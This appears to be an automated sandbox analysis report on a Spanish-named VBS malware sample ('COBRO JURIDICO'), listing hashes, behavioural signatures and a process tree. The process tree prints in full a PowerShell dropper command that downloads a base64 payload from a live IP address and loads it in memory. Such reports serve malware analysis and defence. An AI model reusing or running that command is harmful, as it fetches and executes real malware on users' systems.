Analysis
-
max time kernel
43s -
max time network
47s -
platform
windows7_x64 -
resource
win7-20220901-en -
resource tags
arch:x64arch:x86image:win7-20220901-enlocale:en-usos:windows7-x64system -
submitted
09/10/2022, 06:14
Static task
static1
Behavioral task
behavioral1
Sample
56325762828282 COBRO JURIDICO.vbs
Resource
win7-20220901-en
5 signatures
150 seconds
General
-
Target
56325762828282 COBRO JURIDICO.vbs
-
Size
437KB
-
MD5
3ae400fde403322cee0a88408828cba8
-
SHA1
7aac489534006c5de8080d639f29f9fdcc5a0079
-
SHA256
3b8b7f389603923a9fabf32a34ba6301ed3df38ee7eeaac068c8c108409b5532
-
SHA512
2c435502f2900ed9d45c340e35e3f41110e6dfd981c60898bf30a4d8e971435f80674b6073d05faf33fae6ef7a907c3e9908586051155ced341878c5dfbb6084
-
SSDEEP
48:kklC0eHz7/m7rJv4PsfbuUbNbbldPQ/Pe20NrFR4PLEvvldI:nl+/mrOeqUZldSPKNrY4vvldI
Score
10/10
Malware Config
Extracted
Language
ps1
Deobfuscated
URLs
ps1.dropper
http://20.7.14.99/dll/dll_ink.pdf
Signatures
-
Blocklisted process makes network request 1 IoCs
flow pid Process 3 1028 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 1028 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 1028 powershell.exe -
Suspicious use of WriteProcessMemory 3 IoCs
description pid Process procid_target PID 1672 wrote to memory of 1028 1672 WScript.exe 27 PID 1672 wrote to memory of 1028 1672 WScript.exe 27 PID 1672 wrote to memory of 1028 1672 WScript.exe 27
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\56325762828282 COBRO JURIDICO.vbs"1⤵
- Suspicious use of WriteProcessMemory
PID:1672 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Byte[]] $rOWg = [system.Convert]::FromBase64string((New-Object Net.WebClient).DownloadString('http://20.7.14.99/dll/dll_ink.pdf'));[System.AppDomain]::CurrentDomain.Load($rOWg).GetType('Fiber.Home').GetMethod('VAI').Invoke($null, [object[]] ('0/YUskG/d/ee.etsap//:sptth'))2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1028
-